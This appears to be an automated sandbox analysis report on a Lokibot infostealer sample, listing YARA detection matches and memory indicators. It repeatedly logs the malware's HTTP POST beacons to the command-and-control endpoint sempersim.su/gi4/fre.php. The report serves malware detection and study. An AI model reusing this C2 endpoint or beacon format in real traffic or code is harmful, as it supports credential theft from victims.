                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: cmdkey.exe, 00000001.00000002.637801190.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sempersim.su/gi4/fre.php
                Source: cmdkey.exe, cmdkey.exe, 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cmdkey.exe, 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: unknownHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 196Connection: close
                Source: unknownDNS traffic detected: queries for: sempersim.su
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_00404ED4 recv,

                System Summary

                barindex
                Source: 1.0.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.TRANSFER.EXE.451dcd0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 0.2.TRANSFER.EXE.451dcd0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.389104727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: Process Memory Space: TRANSFER.EXE PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: cmdkey.exe PID: 5816, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: TRANSFER.EXE, u005bA28u005d_u005bA43F069u005d/u005bC7Eu005d_u005b74F2B70u005d.csLarge array initialization: .ctor: array initializer size 544088
                Source: 0.0.TRANSFER.EXE.6a0000.0.unpack, u005bA28u005d_u005bA43F069u005d/u005bC7Eu005d_u005b74F2B70u005d.csLarge array initialization: .ctor: array initializer size 544088
                Source: 1.0.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
